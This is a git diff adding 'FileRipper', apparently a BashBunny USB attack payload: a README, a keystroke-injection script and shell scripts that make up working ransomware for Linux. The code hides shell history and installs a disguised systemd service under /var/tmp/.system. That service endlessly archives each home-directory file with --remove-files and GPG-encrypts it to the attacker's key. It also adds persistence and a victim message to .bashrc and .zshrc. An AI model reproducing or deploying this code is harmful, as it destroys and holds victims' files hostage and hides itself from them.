diff --git a/payloads/library/execution/FileRipper/README.md b/payloads/library/execution/FileRipper/README.md
new file mode 100644
index 00000000..3d609fec
--- /dev/null
+++ b/payloads/library/execution/FileRipper/README.md
@@ -0,0 +1,51 @@
+## About:
+* Title: FileRipper
+* Description: FileRipper is a payload which encrypts users data.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Execution
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## FileRipper: FileRipper is a payload which encrypts users data using asymmetric cipher.
+
+### Features:
+* Encrypts personal files and directories in home directory.
+* Decryptable using private key.
+* Persistent.
+* Autostart payload on boot.
+
+### Workflow:
+1. Stop storing history, this helps to keep tracks clear from begining.
+2. Importing Public GPG key.
+3. Creating non-root systemd service.
+4. Deploying fileRipper.
+5. Autostarting service on opening terminal with shell (bash and zsh).
+6. Entering Message.
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------- |
+| payload.txt | /payload/switch1/ |
+| payload.sh | /payload/ |
+| fileRipper | /tools/ |
+| public.pub | /tools/ |
+
+### Changes to be made:
+* Replace key name "alice" with your key name in payload.sh on line no ```50```.
+* Replace key name "alice" with your key name in fileRipper on line no ```6```.
+
+### Usage:
+* #### Create new key pair:
+ ```gpg --full-gen-key --expert```
+* #### Dump public key of freshly created gpg key:
+ ```gpg --armor --export > public.pub```
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
+
diff --git a/payloads/library/execution/FileRipper/fileRipper b/payloads/library/execution/FileRipper/fileRipper
new file mode 100644
index 00000000..df475a3c
--- /dev/null
+++ b/payloads/library/execution/FileRipper/fileRipper
@@ -0,0 +1,11 @@
+#!/bin/sh
+cd ~/
+encrypt(){
+ dirFile=$(ls | head -n 1)
+ tar cf ~/.crypttt/$dirFile.tar.gz --exclude='.' --exclude='..' --exclude='.crypttt' --remove-files $dirFile
+ gpg -e -r alice -o ~/.crypttt/$dirFile.tar.gpg ~/.crypttt/$dirFile.tar.gz && rm -rf ~/.crypttt/$dirFile.tar.gz
+}
+for (( ; ; ))
+do
+ encrypt
+done
diff --git a/payloads/library/execution/FileRipper/payload.sh b/payloads/library/execution/FileRipper/payload.sh
new file mode 100644
index 00000000..8eace516
--- /dev/null
+++ b/payloads/library/execution/FileRipper/payload.sh
@@ -0,0 +1,15 @@
+#!/bin/bash
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cp -r $mntt/tools/public.pub /tmp
+gpg --import /tmp/public.pub
+rm /tmp/public.pub
+mkdir ~/.crypttt
+mkdir -p ~/.config/systemd/user
+echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysCall -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/libSystemIO.service
+mkdir /var/tmp/.system
+cp -r $mntt/tools/fileRipper /var/tmp/.system/sysCall
+chmod +x /var/tmp/.system/sysCall
+echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"echo Enter Your message here\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"echo Enter Your message here\" >> ~/.bashrc\nfi" > ~/tmmmp
+chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp
diff --git a/payloads/library/execution/FileRipper/payload.txt b/payloads/library/execution/FileRipper/payload.txt
new file mode 100644
index 00000000..c2ca2299
--- /dev/null
+++ b/payloads/library/execution/FileRipper/payload.txt
@@ -0,0 +1,99 @@
+# Title: FileRipper
+# Description: FileRipper is a payload which encrypts users data.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: Unix-like operating systems with systemd.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [executing payload script]
+Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 2000
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+# REM replace 'alice' with name of your key
+Q STRING gpg --edit-key alice
+Q ENTER
+Q DELAY 300
+Q STRING trust
+Q ENTER
+Q DELAY 200
+Q STRING 5
+Q ENTER
+Q DELAY 190
+Q STRING y
+Q ENTER
+Q CTRL c
+Q DELAY 200
+Q STRING gpg --check-trustdb
+Q ENTER
+Q STRING gpg --update-trustdb
+Q ENTER
+Q DELAY 300
+Q STRING systemctl --user enable --now libSystemIO.service
+Q ENTER
+Q DELAY 300
+Q STRING systemctl --user start libSystemIO.service
+Q ENTER
+Q DELAY 100
+Q DELAY 200
+
+# REM [autostart on opening terminal]
+Q STRING echo systemctl --user enable --now libSystemIO.service >> ~/.zshrc
+Q ENTER
+Q DELAY 200
+Q STRING echo systemctl --user enable --now libSystemIO.service >> ~/.bashrc
+Q ENTER
+
+# REM [Message]
+# REM Remove this block if you dont want to prompt message to victim.
+# REM Change your message.
+Q ENTER
+Q DELAY 100
+Q STRING echo "echo Enter Your Message Here" >> ~/.bashrc
+Q ENETR
+Q STRING echo "echo Enter Your Message Here" >> ~/.zshrc
+Q ENTER
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+# Q STRING exit
+Q ENTER
+LED FINISH